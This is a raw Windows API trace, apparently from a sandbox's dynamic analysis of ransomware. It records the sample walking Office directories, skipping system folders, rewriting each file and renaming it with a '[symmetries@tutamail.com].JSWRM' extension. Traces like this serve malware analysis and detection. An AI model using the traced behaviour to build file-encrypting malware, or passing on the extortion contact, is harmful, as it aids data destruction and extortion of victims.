[0121.407] ReadFile (in: hFile=0x238, lpBuffer=0x209530, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.408] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.408] WriteFile (in: hFile=0x238, lpBuffer=0x209530*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0121.408] CloseHandle (hObject=0x238) returned 1 [0121.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0121.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0121.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0121.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0121.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0121.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0121.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.408] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0121.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0121.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0121.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0121.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0121.409] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_ONLINE_K_COL.HXK", cAlternateFileName="SKCD34~1.HXK")) returned 1 [0121.409] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2=".") returned 1 [0121.409] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="..") returned 1 [0121.409] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="...") returned 1 [0121.409] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="windows") returned -1 [0121.409] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="recovery") returned 1 [0121.409] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="perflogs") returned 1 [0121.410] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="documents and settings") returned 1 [0121.410] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.410] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="system volume information") returned -1 [0121.410] lstrcmpiW (lpString1="SKYPEFB_ONLINE_K_COL.HXK", lpString2="msocache") returned 1 [0121.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0121.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_K_COL.HXK", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0121.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0121.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_K_COL.HXK", cchWideChar=24, lpMultiByteStr=0x2412e0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 24 [0121.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0121.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0121.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_K_COL.HXK", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0121.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0121.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_ONLINE_K_COL.HXK", cchWideChar=24, lpMultiByteStr=0x241218, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_ONLINE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 24 [0121.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0121.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0121.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0121.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.411] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0121.411] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0121.411] ReadFile (in: hFile=0x238, lpBuffer=0x209788, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.412] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.412] WriteFile (in: hFile=0x238, lpBuffer=0x209788*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209788*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0121.412] CloseHandle (hObject=0x238) returned 1 [0121.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0121.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0121.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0121.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0121.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0121.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.412] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_ONLINE_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_online_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0121.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0121.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0121.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0121.413] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x26d8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SLINTL.DLL", cAlternateFileName="")) returned 1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2=".") returned 1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="..") returned 1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="...") returned 1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="windows") returned -1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="recovery") returned 1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="perflogs") returned 1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="documents and settings") returned 1 [0121.413] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0121.414] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="system volume information") returned -1 [0121.414] lstrcmpiW (lpString1="SLINTL.DLL", lpString2="msocache") returned 1 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SLINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0121.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SLINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0121.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0121.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0121.414] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca8e89fe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8e89fe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3b480, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SOCIALCONNECTORRES.DLL", cAlternateFileName="SOCIAL~1.DLL")) returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2=".") returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="..") returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="...") returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="windows") returned -1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="recovery") returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="perflogs") returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="documents and settings") returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="$RECYCLE.BIN") returned 1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="system volume information") returned -1 [0121.414] lstrcmpiW (lpString1="SOCIALCONNECTORRES.DLL", lpString2="msocache") returned 1 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTORRES.DLL", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTORRES.DLL", cchWideChar=22, lpMultiByteStr=0x2411f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOCIALCONNECTORRES.DLL", lpUsedDefaultChar=0x0) returned 22 [0121.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTORRES.DLL", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0121.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SOCIALCONNECTORRES.DLL", cchWideChar=22, lpMultiByteStr=0x2413d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOCIALCONNECTORRES.DLL", lpUsedDefaultChar=0x0) returned 22 [0121.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0121.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0121.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0121.415] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4770c42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4770c42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4770c42, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x644, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SPACE.VRD", cAlternateFileName="")) returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2=".") returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="..") returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="...") returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="windows") returned -1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="recovery") returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="perflogs") returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="documents and settings") returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="$RECYCLE.BIN") returned 1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="system volume information") returned -1 [0121.415] lstrcmpiW (lpString1="SPACE.VRD", lpString2="msocache") returned 1 [0121.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE.VRD", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPACE.VRD", lpUsedDefaultChar=0x0) returned 9 [0121.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE.VRD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0121.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SPACE.VRD", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SPACE.VRD", lpUsedDefaultChar=0x0) returned 9 [0121.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0121.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0121.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0121.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SPACE.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\space.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.416] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1604) returned 1 [0121.416] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x640) returned 0x2332c0 [0121.416] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x640, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x640, lpOverlapped=0x0) returned 1 [0121.418] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.418] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x640, lpOverlapped=0x0) returned 1 [0121.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0121.418] CloseHandle (hObject=0x238) returned 1 [0121.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0121.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0121.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.418] HeapFree (in: 